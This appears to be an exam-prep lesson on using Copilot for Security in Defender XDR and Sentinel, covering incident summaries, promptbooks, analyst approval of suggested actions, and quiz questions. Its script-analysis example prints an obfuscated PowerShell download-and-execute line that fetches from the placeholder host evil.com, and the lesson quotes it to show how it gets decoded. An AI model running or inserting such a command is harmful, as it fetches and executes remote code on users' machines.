Copilot for Security: Your AI Analyst
AI is joining the SOC. Learn how embedded Copilot for Security accelerates incident investigation with natural language queries, automatic summaries, and guided response in Defender XDR and Sentinel.
AI in the SOC
Imagine having a brilliant analyst sitting next to you who has read every Microsoft security doc, every MITRE technique, and every incident report — and can summarise any incident in seconds.
That is Copilot for Security. It is embedded directly in Defender XDR and Sentinel, so you can ask it questions in plain English: “Summarise this incident,” “What is this script doing?”, “What should I do next?”
Copilot does not replace analysts — it accelerates them. It handles the repetitive analysis (reading logs, correlating events, explaining scripts) so the human analyst can focus on decisions and judgment.
Where Copilot appears
Copilot for Security is embedded in multiple places:
| Location | What Copilot Does |
|---|---|
| Incident summary | Auto-generates a plain-English summary of the incident — what happened, what entities are involved, what the impact is |
| Alert investigation | Explains what triggered the alert and provides context from Microsoft’s threat intelligence |
| Script analysis | Decodes and explains PowerShell, command-line, and script content found in alerts |
| Guided response | Suggests next steps based on the incident type and current investigation state |
| KQL assistant | Helps write or explain KQL queries in Advanced Hunting |
| Sentinel notebooks | Assists with Python code and investigation logic in Jupyter notebooks |
Key Copilot capabilities
Incident summarisation
When you open an incident, Copilot auto-generates a summary: “This incident involves a phishing email sent to 12 users, 3 of whom clicked the link. One user submitted credentials on the phishing site. Attack disruption disabled the compromised account.”
This saves Tier 1 analysts 5-10 minutes of manual alert review per incident.
Script analysis
Attackers use obfuscated scripts to evade detection. Copilot decodes and explains them:
Obfuscated PowerShell:
$a=[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cDovL2V2aWwuY29tL3BheWxvYWQ='));IEX(New-Object Net.WebClient).DownloadString($a)
Copilot explanation: “This script decodes a Base64 string to reveal the URL http://evil.com/payload, then downloads and executes the content from that URL. This is a classic download-and-execute pattern commonly used for malware delivery.”
Guided response
Copilot suggests investigation and remediation steps based on the incident context:
- “Check if other users received the same phishing email”
- “Review the compromised user’s recent sign-in activity”
- “Reset the user’s password and revoke active sessions”
- “Block the phishing URL as an indicator”
Promptbooks
Promptbooks are pre-built investigation workflows — a sequence of prompts that Copilot executes in order:
| Promptbook | What It Does |
|---|---|
| Incident investigation | Summarise → list entities → check TI → suggest response |
| Vulnerability impact | Identify affected assets → assess exposure → recommend patching |
| Suspicious script analysis | Decode → explain behaviour → identify IOCs → suggest containment |
| User compromise investigation | Check sign-ins → check audit logs → check MFA changes → suggest remediation |
You can also create custom promptbooks for your organisation’s specific investigation workflows.
Agentic AI in Copilot for Security
The term agentic AI in the exam context refers to Copilot’s ability to:
- Chain investigation steps — follow leads from one finding to the next with guided prompts
- Suggest autonomous actions — within defined guardrails, Copilot proposes next steps (e.g., “query this table next”, “check this entity”)
- Reason about context — understand the incident holistically, not just individual alerts
Critical distinction: Copilot suggests and assists — the analyst reviews and approves. Agentic does not mean fully autonomous.
Exam tip: Copilot assists but does not replace
The exam expects you to know that Copilot:
- Can: Summarise incidents, explain scripts, suggest next steps, write KQL, enrich entities
- Cannot: Independently make remediation decisions (it suggests, the analyst approves), access data it does not have permissions for, or guarantee 100% accuracy
If a question asks “what should the analyst do after Copilot suggests remediation steps?” — the answer is review and approve the suggestions, not blindly follow them.
Scenario: James uses Copilot during a complex investigation
James at Pacific Meridian opens a complex incident with 23 alerts across 8 entities. Manually correlating these would take an hour.
Copilot interaction:
- James clicks “Summarise incident” → Copilot produces: “Multi-stage attack beginning with a phishing email to 3 HR staff. One compromised account was used to access SharePoint HR files. The attacker then moved laterally to a file server using stolen NTLM credentials.”
- James asks: “What is the obfuscated PowerShell in alert #7 doing?” → Copilot decodes and explains the Base64-encoded downloader
- James asks: “Which devices should I prioritise for investigation?” → Copilot ranks devices by number of related alerts and severity
- James uses the “User compromise” promptbook → Copilot checks sign-ins, audit logs, MFA changes, and reports findings
Result: Investigation that would have taken 90 minutes completed in 25 minutes. James still makes all remediation decisions.
James encounters an obfuscated PowerShell script in a Defender XDR alert. He cannot understand what the script does. What is the fastest way to analyse it?
Copilot for Security suggests resetting a user's password and revoking all sessions after detecting an account compromise. What should the analyst do?
🎬 Video coming soon
Next up: AI has accelerated our investigation. Now let’s tackle the hardest incidents — complex, multi-stage attacks with lateral movement across domains.